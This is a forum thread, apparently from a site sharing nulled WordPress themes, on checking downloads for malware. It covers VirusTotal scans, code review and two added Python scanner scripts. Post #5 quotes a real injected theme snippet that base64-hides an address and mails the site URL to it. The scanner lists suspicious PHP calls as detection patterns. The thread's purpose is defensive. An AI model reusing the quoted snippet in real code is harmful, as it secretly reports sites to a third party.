

04-28-2014, 07:39 AM (This post was last modified: 05-20-2014 12:33 PM by incredibleINDIA.)
Post: #1
[ MUST READ ] SOMETHING THAT EVERYONE MUST DO BEFORE USING DOWNLOADED CODES AND THEMES
DON'T SKIP A WORD IF YOU WANT YOUR BUSINESS/WORK TO KEEP RUNNING LIKE BUTTER


There are so many methods to stay on the secure side. I am going to post each and every method I use before using any code/script/theme:

1. VIRUSTOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
(Time taken to make the post: 45 min) POST #2

2. CODE CHECKING + OTHER INFECTED CODE DETECTION METHODS
(Time taken to make the post: 30 min) POST #7

3. SOON GOING TO POST ...... OTHER MEMBERS ARE MORE THAN WELCOME

HOW YOU CAN HELP ME AND OTHERS
-TRY TO ADD A FEW REPS; THAT MIGHT AMUSE ME
-IF SOME OTHER MEMBER HAS SHARED SOMETHING GOOD, TRY TO ADD REPS
-IF YOU NEED ANY MODIFICATION IN MY THREAD, YOU ARE MORE THAN WELCOME
-I AM NOT PERFECT, BUT YOU GUYS CAN MAKE IT PERFECT
-ANY SUGGESTION, SEND A PM
-+5 REPS FOR ADDING NEW TYPES OF VULNERABILITY
04-28-2014, 07:43 AM (This post was last modified: 04-30-2014 09:50 AM by incredibleINDIA.)
Post: #2
VIRUS TOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
--------------------------------------------------------------------------------

STEP #1 =>

Everyone knows the first step but always does it the wrong way. Instead of scanning the download link in VirusTotal, first download the theme/code/script/template or anything else you need from here. Then upload the zipped file to VirusTotal for scanning. I will post soon why scanning the link sometimes shows a different result than scanning the file itself.

Once your file is scanned, check out the detection ratio:
if the detection ratio is more than 3, read STEP #2,
and if the detection ratio is less than 3, read STEP #3.

STEP #2 =>

In simple words: "DON'T USE IT !!!". Also, to help out other lazy members, post a link to your VirusTotal scan in the thread where you found the download (try to use a big text size so that everyone can see it).

Check out the other threads/downloads of that member for infections.

If the member has an infection in only one thread:
PM the member who added that link about it. If the member does not respond within 24 hours, make a thread in the Support Center [LALA is going to help you].

And if the member has infections in many threads:
PM DIRECT DOWNLOAD about the member, with all required information like the username of the person, the threads you found infected, and anything else you need to add.

STEP #3 =>

Check out who posted it. Yes, it's true, try to check out who posted it.

If a member has 3000+ reps, 800+ posts, and is a 1 year+ BBHF member:
Add a post with the VirusTotal report in his/her thread and also PM him/her about it, asking why it's showing so. 80% of members with that profile are TRUE and not going to cheat you. SOMETIMES NULLING A SCRIPT STARTS SHOWING UP AS AN INFECTION.

If the member is a newbie:
Either use it at your own risk, or follow STEP #2.
I found that so many shares made by newbies of BBHF in this section of the forum are just links copied from other nulling/pirated websites.
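The lookup-and-threshold part of the post above, as an added example (not code from the thread or from any member): hash the downloaded archive, ask VirusTotal for its report over the public v3 API (GET /api/v3/files/{sha256} with an x-apikey header; a 404 means the file was never uploaded, so upload it through the site first as the post says), read the detection count, and branch to STEP #2 or STEP #3 by the post's threshold. The network call is kept in its own function so the rest runs offline on a constructed response; engine names and counts in SAMPLE_REPORT are invented, and treating exactly 3 detections as STEP #2 is my own conservative reading, since the post only covers "more than 3" and "less than 3".

```python
"""VirusTotal hash-lookup triage for a downloaded theme/script archive (added example)."""
import hashlib
import json
import tempfile
import urllib.request

VT_FILES_URL = "https://www.virustotal.com/api/v3/files/"


def sha256_of_file(path, chunk=1 << 20):
    """Stream the file through SHA-256; VirusTotal identifies files by this hash."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def fetch_report(sha256, api_key):
    """GET the VirusTotal v3 file object for a hash (needs network and an API key).
    HTTP 404 means VirusTotal has never seen the file: upload it first."""
    req = urllib.request.Request(VT_FILES_URL + sha256, headers={"x-apikey": api_key})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def detection_ratio(report):
    """(engines that flagged the file as malicious, engines that returned a verdict)."""
    stats = report["data"]["attributes"]["last_analysis_stats"]
    malicious = stats.get("malicious", 0)
    total = sum(stats.get(k, 0) for k in ("malicious", "suspicious", "undetected", "harmless"))
    return malicious, total


def flagging_engines(report):
    """(engine, label) pairs for the engines that flagged the file, for posting in the thread."""
    results = report["data"]["attributes"]["last_analysis_results"]
    return sorted((name, r.get("result")) for name, r in results.items()
                  if r.get("category") == "malicious")


def decide(malicious):
    """The post's rule: more than 3 detections -> STEP #2, fewer than 3 -> STEP #3.
    Exactly 3 is not covered by the post; treated as STEP #2 here (assumption)."""
    if malicious >= 3:
        return "STEP #2: don't use it; post the scan link in the download thread"
    return "STEP #3: low ratio; check who posted it before trusting it"


def triage(path, api_key):
    """End-to-end: hash, look up, summarise. Returns a dict you can paste into a post."""
    digest = sha256_of_file(path)
    report = fetch_report(digest, api_key)
    malicious, total = detection_ratio(report)
    return {"sha256": digest, "ratio": f"{malicious}/{total}",
            "engines": flagging_engines(report), "verdict": decide(malicious)}


# Constructed response in the shape of a v3 file object; engine names and counts are invented.
SAMPLE_REPORT = {
    "data": {"type": "file", "id": "0" * 64, "attributes": {
        "last_analysis_stats": {"malicious": 4, "suspicious": 0, "undetected": 50,
                                "harmless": 0, "type-unsupported": 2},
        "last_analysis_results": {
            "EngineA": {"category": "malicious", "result": "PHP:Backdoor-gen"},
            "EngineB": {"category": "malicious", "result": "Trojan.PHP.Agent"},
            "EngineC": {"category": "malicious", "result": "Backdoor.PHP.Shell"},
            "EngineD": {"category": "malicious", "result": "PHP/WebShell"},
            "EngineE": {"category": "undetected", "result": None},
        },
    }},
}


def hash_demo():
    """Hash a constructed 3-byte file; SHA-256(b"abc") is a well-known test vector."""
    with tempfile.NamedTemporaryFile(delete=False) as fh:
        fh.write(b"abc")
    return sha256_of_file(fh.name)


if __name__ == "__main__":
    malicious, total = detection_ratio(SAMPLE_REPORT)
    print(f"detections {malicious}/{total} -> {decide(malicious)}")
    print("flagged by:", flagging_engines(SAMPLE_REPORT))
```

Run `triage("theme.zip", api_key)` with a real key to get the same dict for a real download; the ratio VirusTotal shows on the web is the malicious count over engines that answered, which is what `detection_ratio` reproduces.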
04-28-2014, 08:42 AM
Post: #3
RE:
@patelnirpendra, thank you.

Nice idea. If I may, I will also suggest testing on localhost with XAMPP, and using these WordPress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are WordPress plugins).
You can also put phpMalCodeScanner.php (google it) in your WordPress blog folder.

Hope this was helpful.
04-28-2014, 08:58 AM
Post: #4
RE:
(04-28-2014 08:42 AM)semerkhet22 Wrote:  @patelnirpendra, thank you.
Thanks for it, I will add it all soon; some ideas are even new to me too.
I use Query Monitor and the TAC WordPress plugin.

+5 reps added for you, now you are no longer a virgin.
04-30-2014, 07:21 AM
Post: #5
RE:
Hi,
I think that everyone should be involved in this thread by patelnirpendra, as we all have something to gain from it.
It will also be very helpful to all of us to share all malicious code that has been discovered, in encoded and decoded format.

PHP Code:
// Injected into a nulled theme's functions.php. Runs on every front-end page render (wp_head hook).
add_action('wp_head', 'my_wpfunww7c8bb');
function my_wpfunww7c8bb() {
    // Keeps firing until a user named "wordpress" exists on the site.
    if (!username_exists('wordpress')) {
        // base64 hides the recipient: "d29yZHByZXNzc2xvZ0B5YW5kZXguY29t" decodes to wordpressslog@yandex.com
        $addressdecode = base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");
        $vari = 'Wordpress Plugin';
        // Mails the site URL to that address, i.e. reports every install running this theme.
        wp_mail($addressdecode, $vari, get_bloginfo('wpurl'));
    }
}

This will keep sending email to wordpressslog@yandex.com; as this email does not exist, your email server will keep resending.

Also search for every "wp_create_user" and delete the function.

Another threat is the sneaky social.png: it is not really an image, as you can see the malicious code if you open it in a text editor. It will insert a custom option into the wp_options table to redirect to a YouTube video.
Hope this will help.
04-30-2014, 09:30 AM
Post: #6
RE:
(04-30-2014 07:21 AM)semerkhet22 Wrote:  Hi,
YOU FOUND IT INJECTED SOMEWHERE, OR YOU MADE IT?
04-30-2014, 09:48 AM (This post was last modified: 04-30-2014 09:53 AM by incredibleINDIA.)
Post: #7
RE:
CODE CHECKING + OTHER INFECTED CODE DETECTION METHODS
-------------------------------------------------------------


INTRODUCTION TO BACKDOORS :

Creating a backdoor for bypassing authentication and then remotely accessing your website is too easy. Even I can do it. One line of code can add a new admin to your website with the username and password I want.

Some hackers can even send emails from your server, execute SQL queries, and do everything else they want.


HOW TO BE ON THE SAFE SIDE :

1. TRY NOT TO USE PLUGINS THAT ARE NOT REALLY NECESSARY, BECAUSE UNDERSTANDING THE CODE BEHIND A PLUGIN IS MUCH TOUGHER THAN UNDERSTANDING THE CODE BEHIND A THEME.

2. OPEN ALL FILES IN NOTEPAD++ and search for "base64", "eval" etc.; there are a lot more packers.

These packers are used for three purposes:
a. FOR ADDING AN AUTHOR CREDIT
b. FOR HIDING SOME IMPORTANT LINES OF CODE
c. FOR ADDING A BACKDOOR

Once you have found them, try to decode them; there are so many online decoders.

Hackers never add plain code: they either pack it or encode it, and sometimes load code from an external JavaScript file.

There are so many online utilities/programs that allow you to decode these. Decode it and read the code. You can smell redirection code or a backdoor if there are suspicious words like user or password, a URL of a website, or external code that has nothing to do with your theme/plugin.

FILES MOST TARGETED BY HACKERS IN WORDPRESS THEMES :

wp-config.php – The first thing that comes into a BAD ASS GUY'S mind is this file. It is because WordPress gave this file super powerful authentication to change anything and everything.

wp-includes folder – Another of the most attacked places. If you have an open directory with file adding enabled .... then YOU ARE SUNK. Anybody can add a shell.

But most of us don't look at it.
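The manual checks from post #5 (decode the base64 literal, find every wp_create_user, catch the "social.png" that is really PHP) and from post #7 (search every file for base64/eval and other packers, decode them, look for user, password, URLs or foreign code) as one scanner, added here as an example; it is not code from the thread or from any member. The sample theme it builds is constructed for the demo: its functions.php holds the snippet posted in post #5, the images/social.png content is an invented stand-in for the option-writing PHP post #5 describes, and the call list, keyword list and function names are my own choices. As post #9 notes, legitimate code also uses base64 and eval, so every hit is a place to read, not a verdict.

```python
"""Static triage of a downloaded WordPress theme/plugin tree (added example)."""
import base64
import binascii
import os
import re
import tempfile

# Calls worth reading by hand: code packers/executors plus the WordPress user-creation and mail APIs.
CALL_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function|assert"
    r"|system|shell_exec|passthru|exec|wp_create_user|wp_insert_user|wp_mail)\s*\("
)
# A quoted run of base64 alphabet, 16+ chars, optional padding.
B64_RE = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
# Words that smell like a backdoor once a literal is decoded (post #7's list, plus '@' for e-mail).
KEYWORDS = ("user", "pass", "admin", "http", "@", "wp_create_user", "eval(")
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SOURCE_EXTS = (".php", ".inc", ".phtml", ".js")


def decode_base64_literals(text):
    """(literal, decoded) for each quoted base64 literal that decodes to readable text."""
    found = []
    for m in B64_RE.finditer(text):
        lit = m.group(1)
        try:
            decoded = base64.b64decode(lit, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            found.append((lit, decoded))
    return found


def scan_source(text):
    """Findings for one source file: suspicious calls by line, then decoded base64 with keyword hits."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            findings.append({"kind": "call", "line": lineno, "detail": m.group(1)})
    for lit, decoded in decode_base64_literals(text):
        hits = [k for k in KEYWORDS if k in decoded.lower()]
        if hits:
            lineno = text[: text.index(lit)].count("\n") + 1
            findings.append({"kind": "base64", "line": lineno, "detail": decoded, "keywords": hits})
    return findings


def is_fake_image(path):
    """True when the extension claims an image but the first bytes are not an image header."""
    magics = IMAGE_MAGIC.get(os.path.splitext(path)[1].lower())
    if magics is None:
        return False
    with open(path, "rb") as fh:
        head = fh.read(8)
    return not any(head.startswith(m) for m in magics)


def scan_tree(root):
    """Walk the tree; returns {relative path: findings} for files that have any."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            findings = []
            if is_fake_image(path):
                findings.append({"kind": "fake-image", "line": 0, "detail": "image extension, non-image header"})
            # Fake images are read as source too, since that is where the PHP hides.
            if findings or name.lower().endswith(SOURCE_EXTS):
                with open(path, "rb") as fh:
                    findings.extend(scan_source(fh.read().decode("utf-8", errors="replace")))
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def build_sample_theme():
    """Constructed tree: post #5's snippet in functions.php, PHP named social.png, a clean index.php."""
    root = tempfile.mkdtemp(prefix="nulled-theme-")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "functions.php"), "w") as fh:
        fh.write(
            "<?php\n"
            "add_action('wp_head','my_wpfunww7c8bb');\n"
            "function my_wpfunww7c8bb(){if(!username_exists('wordpress')){\n"
            "$addressdecode=base64_decode(\"d29yZHByZXNzc2xvZ0B5YW5kZXguY29t\");\n"
            "$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}\n"
        )
    with open(os.path.join(root, "images", "social.png"), "w") as fh:  # PHP behind a .png name (invented)
        fh.write("<?php update_option('redirect_target', 'https://www.youtube.com/'); ?>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php get_header(); get_footer(); ?>\n")
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan_tree(build_sample_theme()).items()):
        for f in findings:
            extra = f" {f['keywords']}" if "keywords" in f else ""
            print(f"{rel}:{f['line']}: {f['kind']}: {f['detail']}{extra}")
```

Point `scan_tree` at the unzipped download instead of the sample tree; on the post #5 snippet it reports the base64_decode and wp_mail calls on their lines and prints the decoded recipient address, and social.png is flagged before its content is even read.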
04-30-2014, 01:36 PM (This post was last modified: 04-30-2014 01:36 PM by semerkhet22.)
Post: #8
RE:
@patelnirpendra, sorry if you did not understand me.

I was pointing to the fact that we must share all known malware that we encountered while testing downloaded themes and plugins, so members could identify real threats.

Sorry again for the misunderstanding.
04-30-2014, 01:43 PM
Post: #9
RE:
Using the Exploit Scanner plugin, there's a lot of base64 and eval code in native WordPress and in plugins that MANY people use.
04-30-2014, 02:12 PM
Post: #10
RE:
You are very wrong about using virustotal.com. I commend you for trying to help people stay safe, but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time.

That site is nothing more than a warm fuzzy for people who don't know better. It does nothing to detect 0day threats or polymorphic threats. They use featureless CLI utilities that don't include the tools necessary to be a viable A/V.

We all know that A/V products in general are an over-hyped method of security. Nothing beats due diligence and actually looking at the code yourself.

I would say to anyone reading the OP's section on virustotal.com to disregard it as an opinion not based upon fact.

I would encourage everyone to read their FAQ, more specifically the section on statistics. It's the part where they say not to use their own product in the manner in which this thread is pushing it. Here, take a look.

Those who use VirusTotal to perform antivirus comparative analyses should know that they are making many implicit errors in their methodology, the most obvious being:

VirusTotal's antivirus engines are commandline versions, so depending on the product, they will not behave exactly the same as the desktop versions: for instance, desktop solutions may use techniques based on behavioural analysis and count with personal firewalls that may decrease entry points and mitigate propagation, etc.
In VirusTotal desktop-oriented solutions coexist with perimeter-oriented solutions; heuristics in this latter group may be more aggressive and paranoid, since the impact of false positives is less visible in the perimeter. It is simply not fair to compare both groups.
Some of the solutions included in VirusTotal are parametrized (in coherence with the developer company's desire) with a different heuristic/aggressiveness level than the official end-user default configuration.

These are just three examples illustrating why using VirusTotal for antivirus testing is a bad idea; you can read more about VirusTotal and antivirus comparatives in our blog.


https://www.virustotal.com/en/faq/#statistics